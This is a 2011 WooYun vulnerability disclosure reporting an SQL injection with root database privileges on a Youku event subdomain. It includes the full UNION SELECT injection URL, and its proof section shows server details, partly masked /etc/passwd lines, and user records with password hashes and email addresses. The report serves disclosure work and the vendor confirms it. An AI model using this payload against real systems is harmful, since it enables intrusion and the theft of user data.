当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01823

漏洞标题:优酷某分站存在Injection root权限

相关厂商:优酷

漏洞作者: 孤狐浪子

提交时间:2011-04-05 18:05

修复时间:2011-05-05 21:00

公开时间:2011-05-05 21:00

漏洞类型:网络敏感信息泄漏

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-04-05: 细节已通知厂商并且等待厂商处理中
2011-04-05: 厂商已经确认,细节仅向厂商公开
2011-04-15: 细节向核心白帽子及相关领域专家公开
2011-04-25: 细节向普通白帽子公开
2011-05-05: 细节向实习白帽子公开
2011-05-05: 细节向公众公开

简要描述:

优酷视频分站Sql注射漏洞,爆出数据库结构, 主机相关信息,导致信息泄漏,导致大量用户信息泄漏。非常之严重。管理速补。

详细说明:

http://event.youku.com/eleven/fendou/fendou_03.php?uid=3680&vid=XMTg2MTA2OTcy%27 And 1=2 UNION all SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),@@VerSion_compile_Os,vErsioN(),uSer(),datAbase(),sysTem_user(),@@group_concat_max_len,@@dAtadir,@@tmpDir,@@baseDir) ,6 %23

漏洞证明:

=============================
Version:5.0.75-percona-highperf-b11-log
Version_OS:redhat-linux-gnu
User:root@192.168.1.14
DataBase:shanghai2
System_User:root@192.168.1.14
Current_User:root@%
====================================
oxt:x:0:0:root:/rooxx
xin:x:1:1:bin:/bin:/sxx
xxxxon:x:2:2:daemxxgin
adxx:x:3:4:adm:/var/adxxxn/nologin
lxx:x:4:7:lp:/var/spoxx
=========================================
5xxx|352xx0202|5a44fd5e3642xxx3762702|wwwxxx59xx39@qq.com
5xx2|45xxx2005|5a44fd5e3xxx433c3c489c53762702|wwxxx9067@qq.com
xx13|canxxxn789|0bc6xxx868da4cbfdbe70f96f|73xxx441@qq.com
=========================================

修复方案:

过滤

版权声明:转载请注明来源 孤狐浪子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2011-04-05 18:09

厂商回复:

修复中

最新状态:

暂无